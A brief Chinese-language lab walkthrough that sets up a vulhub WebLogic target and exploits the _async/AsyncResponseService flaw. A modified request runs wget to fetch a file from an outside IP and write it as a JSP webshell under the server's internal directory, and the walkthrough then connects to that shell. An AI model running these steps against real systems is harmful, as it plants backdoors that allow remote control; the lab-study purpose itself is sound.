1.环境搭建

cd vulhub-master/weblogic/weak_password
docker-compose up -d

2.漏洞验证

http://47.121.211.205:7001/_async/AsyncResponseService

说明存在漏洞

3.在当前页面抓包 修改请求包 写入shell

wget http://47.121.211.205/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp

4.访问上传文件并进行连接

47.121.211.205:7001/bea_wls_internal/678.jsp

访问上传文件

使用工具进行连接